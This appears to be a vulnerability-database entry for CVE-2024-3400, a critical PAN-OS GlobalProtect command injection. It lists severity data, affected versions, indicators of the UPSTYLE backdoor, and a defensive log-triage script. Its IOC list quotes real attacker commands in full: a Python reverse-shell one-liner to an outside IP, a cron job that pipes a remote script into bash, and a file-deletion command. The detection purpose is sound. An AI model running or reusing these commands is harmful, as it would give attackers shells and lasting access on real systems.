CVE-2024-3400
published 2024-04-12

CVE-2024-3400: A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS…

Priority: P1 (100) · Severity: critical · CVSS 3.1 base score: 10
CVSS 3.1 vector: AV:N / AC:L / PR:N / UI:N / S:C / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT · Ransomware · Initial access
CISA Known Exploited Vulnerability (due 2024-04-19)
Exploited in the wild
EPSS: 100.00% (100.0th percentile)
A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

Affected

24 ranges

Vendor             | Product       | Version range         | Fixed in
palo_alto_networks | pan-os        | >= 10.2.0 < 10.2.9-h1 | 10.2.9-h1
palo_alto_networks | pan-os        | >= 11.0.0 < 11.0.4-h1 | 11.0.4-h1
palo_alto_networks | pan-os        | >= 11.1.0 < 11.1.2-h3 | 11.1.2-h3
paloalto           | cloud_ngfw    |                       |
paloalto           | pan-os        |                       |
paloalto           | prisma_access |                       |
paloaltonetworks   | pan-os        |                       |

Detection & IOCs (extracted from sources)

path: /usr/lib/python3.6/site-packages/system.pth
path: /var/log/pan/sslvpn_ngx_error.log
path: /var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css
path: /etc/cron.d/update
path: /opt/pancfg/mgmt/saved-configs/running-config.xml
filename: update.py
filename: system.pth
command: python -c "import sys,socket,os,pty;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('172.233.228[.]93',443));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/bash')"
command: printf "SHELL=/bin/bash\n\n* * * * * root wget -qO- http://172.233.228[.]93/policy | bash\n\n" > /etc/cron.d/update
command: rm -f /var/appweb/sslvpndocs/global-protect/*.css
regex: img\[([a-zA-Z0-9+/=]+)\]
domain: worldtimeapi.org
  • Monitor for creation or modification of /usr/lib/python3.6/site-packages/system.pth — the UPSTYLE backdoor installer drops this .pth file to achieve persistence via Python's path configuration mechanism.
  • Alert on unexpected writes to /var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css — UPSTYLE appends command output to this legitimate CSS file as its exfiltration channel.
  • Hunt for HTTP requests to the firewall containing the URI pattern img{base64-encoded-data} — UPSTYLE parses /var/log/pan/sslvpn_ngx_error.log for this pattern to extract and execute attacker commands.
  • Detect outbound connections from the GlobalProtect firewall to worldtimeapi.org — observed as attacker-controlled beacon traffic during post-exploitation.
  • Alert on SMB/WinRM lateral movement originating from the GlobalProtect firewall device IP — attackers pivoted internally using a domain admin service account after compromising the firewall.
  • Detect direct-to-IP HTTP requests (no hostname) from the firewall device for payload download — attackers used direct-to-IP HTTP to retrieve tools from C2.
  • Look for the process string 'import sys,socket,os' in the running process list on PAN-OS devices — the reverse shell one-liner contains this distinctive string, detectable via ps -ef.
  • Check for presence of /etc/cron.d/update on PAN-OS devices — the attacker's 'patch' script creates this cron job to periodically pull and execute a remote shell script.
  • Generate a Tech Support File from the PAN-OS device and analyze logs for forensic artifacts to detect compromise.
  • Cloud NGFW, Panorama appliances, and Prisma Access are explicitly NOT affected by CVE-2024-3400 — only specific on-prem PAN-OS versions with GlobalProtect enabled are vulnerable.
  • The UPSTYLE backdoor files (filenames and indicators) were altered by UTA0218 per victim — do not rely solely on static IOCs; behavioral detection is essential.
  • The C2 server at 172.233.228.93 enforced an IP-based access control list — it only responded to requests from the compromised firewall device, making external validation of the C2 from other IPs impossible.
  • Applying mitigations or patches will NOT remediate an existing compromise — affected organizations must separately investigate for breach.
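An added triage helper (example code written for this page, not from the vulnerability database or from Palo Alto Networks) that applies the img[...] regex listed above to constructed sslvpn_ngx_error.log lines and checks a constructed file listing against the UPSTYLE artifact paths from the bullets; decoded content is only surfaced for analyst review, never executed.

```python
import base64
import re

# Regex given in the page's IOC list: UPSTYLE scans the GlobalProtect error log
# for img[<base64>]. Here it is applied only to flag and decode for review.
IMG_PATTERN = re.compile(r"img\[([a-zA-Z0-9+/=]+)\]")

# Persistence and exfiltration artifacts named in the detection bullets above.
ARTIFACT_PATHS = {
    "/usr/lib/python3.6/site-packages/system.pth": "UPSTYLE .pth persistence",
    "/etc/cron.d/update": "cron job that pulls a remote script",
    "/var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css":
        "legitimate CSS file used as exfiltration channel",
}


def find_injected_commands(log_lines):
    """Return (line_no, base64_blob, decoded_text) for each img[...] hit.
    The decoded text is surfaced for an analyst; nothing is executed."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        for match in IMG_PATTERN.finditer(line):
            blob = match.group(1)
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
            except ValueError:  # binascii.Error is a ValueError subclass
                decoded = "<undecodable>"
            hits.append((line_no, blob, decoded))
    return hits


def check_artifacts(present_paths):
    """Given paths present on the device (e.g. from a Tech Support File
    listing), return those matching the known UPSTYLE artifacts."""
    return {p: ARTIFACT_PATHS[p] for p in present_paths if p in ARTIFACT_PATHS}


# Constructed sample log lines (hypothetical, not real device output);
# "aWQ=" is base64 for the harmless placeholder "id".
SAMPLE_LOG = [
    '2024/04/12 10:00:01 [error] 1234#0: *5 SSL-VPN cookie "img[aWQ=]" invalid',
    '2024/04/12 10:00:02 [error] 1234#0: *6 SSL-VPN cookie "session" invalid',
]

# Constructed file listing, as if taken from a device path inventory.
SAMPLE_PATHS = {"/etc/passwd", "/etc/cron.d/update"}

if __name__ == "__main__":
    for line_no, blob, decoded in find_injected_commands(SAMPLE_LOG):
        print(f"line {line_no}: img[{blob}] decodes to {decoded!r} -- review")
    for path, why in check_artifacts(SAMPLE_PATHS).items():
        print(f"artifact present: {path} ({why})")
```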

CVSS provenance

nvd: v3.1, 10.0 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck: 10.0 CRITICAL
cisa: 10.0 CRITICAL